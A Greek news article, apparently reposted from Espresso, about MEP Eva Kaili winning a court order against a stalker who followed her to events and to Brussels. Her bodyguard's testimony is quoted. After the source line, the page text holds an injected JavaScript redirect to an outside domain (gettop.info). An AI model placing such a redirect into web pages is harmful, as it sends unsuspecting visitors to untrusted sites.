Η Εύα Καϊλή «γλίτωσε» από τον φορτικό θαυμαστή «σκιά» της- Αισχρά mail και απειλητικά μηνύματα

0
11

 

Με δικαστική απόφαση η Εύα Καϊλή κατάφερε τελικά να “ξεφορτωθεί” τον θαυμαστή που είχε γίνει η σκιά της, όπου κι αν βρισκόταν (ακόμη και στο Ευρωκοινοβούλιο) φτάνοντας πάντα αρκετά κοντά ώστε να της μιλήσει.
Σύμφωνα με δημοσίευμα της εφημερίδας Espresso ο «επίμονος θαυμαστής» της έστελνε αισχρά ή και απειλητικά e-mail.

Καθημερινά μηνύματα στα μέσα κοινωνικής δικτύωσης, εμφανίσεις σε εκδηλώσεις ανά την Ελλάδα αλλά και μια προσπάθεια να την προσεγγίσει ακόμη και στις Βρυξέλλες είχαν οδηγήσει την ευρωβουλευτή σε κατάθεση αίτησης ασφαλιστικών μέτρων για τον άνδρα.

Ο Ν.Ν είχε τρομοκρατήσει την πολιτικό ενώ οι άνδρες της ασφάλειας της αναγκάστηκαν σε μία περίπτωση ακόμη και να τη φυγαδεύσουν.

Κατά την ακροαματική διαδικασία η ίδια δεν παραστάθηκε στο δικαστήριο, αλλά απών ήταν και ο ενοχλητικός θαυμαστής αφού δεν είχε εντοπιστεί καν, ώστε να του επιδοθεί η αίτηση ασφαλιστικών μέτρων.

«Είναι παντού. Όπου και να πάμε είναι εκεί» φέρεται να κατέθεσε στο δικαστήριο αστυνομικός της ασφάλειας της ευρωβουλευτού και συνέχισε «Την ενοχλεί μέσω μηνυμάτων που την έχουν τρομοκρατήσει. Της στέλνει και αισχρά e-mail. Μια φορά της έστειλε και ένα άρθρο για μια γυναίκα που βρέθηκε νεκρή στη Ρόδο[…] H κυρία Καϊλή ζήτησε και παραπάνω ασφάλεια εξαιτίας της κατάστασης», ανέφερε ο μάρτυρας.

Θυμάμαι μια παρουσίαση σε βιβλιοπωλείο, όπου την είχε ενοχλήσει ιδιαίτερα, την πλησίαζε και της μιλούσε συνεχώς. Σχεδόν δεν την άφηνε να φύγει. Ένα άλλο περιστατικό συνέβη στις 20 Ιανουαρίου 2015 σε εκδήλωση σε ξενοδοχείο όπου είχε παρευρεθεί και ο συγκεκριμένος άνθρωπος. Ήταν αντιδραστικός στον έλεγχο των αστυνομικών και επειδή η κυρία Καϊλή φοβήθηκε αναγκαστήκαμε να τη φυγαδεύσουμε από το υπόγειο πάρκινγκ του ξενοδοχείου” είπε ο αστυνομικός.

Ωστόσο η σταγόνα που ξεχείλισε το ποτήρι ήταν η εμφάνιση του “stalker” στο Ευρωκοινοβούλιο. Όμως έτσι κατάφερε να βρει τα στοιχεία του και να καταθέσει τα ασφαλιστικά μέτρα.

“Ο άνθρωπος έφτασε μέχρι τις Βρυξέλλες για να τη βρει. Το θετικό στην υπόθεση ήταν ότι εκεί έπρεπε αναγκαστικά να δώσει τα στοιχεία του. Φυσικά όταν μάθαμε ότι την ψάχνει αναγκάστηκε να φύγει και από εκεί με αστυνομικούς” κατέθεσε ο μάρτυρας.

 

 

Πηγή: Espresso setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here